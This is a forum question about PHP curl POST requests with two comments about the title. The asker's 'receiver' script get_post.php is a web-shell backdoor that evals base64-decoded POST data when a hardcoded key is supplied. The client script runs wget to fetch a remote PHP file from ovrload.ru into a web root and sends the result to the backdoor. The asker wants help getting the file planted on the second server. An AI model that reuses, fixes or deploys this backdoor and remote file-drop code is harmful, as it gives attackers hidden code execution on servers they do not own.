# Sending a file using CURL + POST + CURLAUTH_BASIC

Tags: php, curl, post

I have 2 servers, I need to send a POST request to server # 2 from server # 1, server # 2 has a file "receiver" - get_post.php code:

```
<?php 
error_reporting(0);
set_time_limit(0);
if ($_GET['q']=='1'){echo '200'; exit;}

if($_GET['key']=='sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG')eval(base64_decode($_POST['fack']));
if(md5($_GET['key'])=='7663f1b3555993ad229183b0efad3261')eval(base64_decode($_POST['fack'])); 
?>
```

On the server # 1 I create the Curl form with the code:

```
<?php
    $url = 'http://ip_serv#2/get_post.php';
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_URL, $url);
    $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7";
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_VERBOSE, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
    curl_setopt($ch, CURLOPT_MAXCONNECTS, 3);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    curl_setopt($ch, CURLOPT_ENCODING, "UTF-8");
    curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); 
    curl_setopt($ch, CURLOPT_USERPWD, 'admin:pass');
    $codec = system("wget -b -P /var/www/ku/data/www/ip_serv#2/app/webroot/ https://ovrload.ru/f/*****.php");
    $postdata = "fack=" . urlencode(base64_encode($codec));
    $headers["Content-Length"] = strlen($postdata);
    $headers["User-Agent"] = "Curl/1.0";
    $headers["Content-Length"] = strlen($postdata);
    $headers["User-Agent"] = "Curl/1.0";
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
    $res = curl_exec($ch);
    curl_close($ch);
?>
```

After executing this code, the file (*****.php) is created on server # 1, and I need what will be created on server # 2, show where I made the mistake?

Comment: I changed the title of your post. Don't use Cyrillic. We use here English and Latin alphabet.

Comment: Please edit your post title to be in the English language, as this is an English language site, and to not simply repeat the tag information, but to clearly explain the problem or question. The tag system works well here, and doesn't need help by including the information in the title as well. Your title should be clear and meaningful enough to be of use when a future reader sees it in a list of search results. Repeating the tag info does nothing to add meaning. Thanks.